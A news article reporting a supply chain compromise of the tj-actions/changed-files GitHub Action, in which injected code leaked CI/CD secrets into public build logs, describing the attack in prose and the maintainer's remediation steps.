Skip to content

Popular GitHub repo targeted in supply chain attack; over 23000 projects affected

  • by
  • 2 min read

A supply chain attack has targeted a popular GitHub repository called tj-actions/changed-files. Security researchers claim that the over 23,0000 other GitHub repositories using the project’s code may also have been affected.

The repository was first breached at some unknown point before March 14. Once in, the intruders changed the repository’s code so the library would leak sensitive information from a project’s developer workflow into publicly available build logs. This means any project using the library would leak sensitive information like API keys and more into its build logs for all to see. Private repositories are less risky, but developers should consider them compromised.

Security firm Sysdig explains what was changed in the GitHub Action’s code in more detail. The hackers injected a Node.js function with base64-encoded commands that ran a Python script on the compromised machine. The script then collected a project’s continuous integration or continuous delivery secrets from the Runner Worker process and added them to the build logs.

Illustration: supimol kumying | shutterstock
Illustration: Supimol Kumying | Shutterstock

The leaked information can include API keys, passwords, access tokens, and other sensitive information that can be used to remotely take over accounts, send fake or malicious API requests, and more. However, no evidence suggests the leaked data was extracted from an external server.

No one knows the threat actor behind the attack yet, but the tj-actions team confirmed that the attack originated from a hacked bot account. The malicious request comes from a personal access token (PAT) linked to the tj-actions-bot account. GitHub hasn’t determined how the PAT was compromised.

Regardless, since the attack, Tonye Jack, author of the tj-actions project, has confirmed that the password for the bot account has been updated, with a passkey thrown in to add more security. Its permissions have also been downgraded to what’s absolutely required, and any commits going forward must be signed to ensure contributor integrity.

In the News: Cloudflare announces post-quantum encryption for business users

Yadullah Abidi

Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: yadullahabidi@pm.me.

Related Reads

This is an image of data breach featured

Legends International suffers data breach affecting employees and venue visitors

This is an image of cyber security hacked breach

Freshly discovered Windows vulnerability already exploited in the wild

This is an image of court featured ss1

Indian consumer courts to accept complaints against WhatsApp

  • by
  • In News
This is an image of discord203947

Discord verifies age with ID and face scans for select users

This is an image of drone 1866742 1280

British soldiers are using radio waves to take down drones

This is an image of cyber security hacked hacking 3889

State-sponsored hackers are increasingly using ClickFix tactics for the first time

>